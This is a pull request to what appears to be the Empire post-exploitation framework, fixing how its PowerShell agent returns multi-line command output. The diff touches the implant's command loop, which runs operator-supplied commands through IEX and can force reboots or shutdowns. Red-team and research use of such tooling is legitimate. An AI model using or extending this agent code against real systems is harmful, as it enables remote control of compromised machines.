### PR TITLE
Corrected the shell output bug (#491)

### DIFF
--- a/empire/server/data/agent/agent.ps1
+++ b/empire/server/data/agent/agent.ps1
@@ -410,8 +410,8 @@ function Invoke-Empire {
                 '(reboot|restart)' { Restart-Computer -force }
                 shutdown { Stop-Computer -force }
                 default {
-                    if ($cmdargs.length -eq '') { $output = IEX $cmd }
-                    else { $output = IEX "$cmd $cmdargs" }
+                    if ($cmdargs.length -eq '') { $output = IEX $cmd | Out-String }
+                    else { $output = IEX "$cmd $cmdargs" | Out-String }
                 }
             }
         }


### PR DESCRIPTION
Multilines output were rendered as single line. The output was sent incorrectly by the Powershell agent.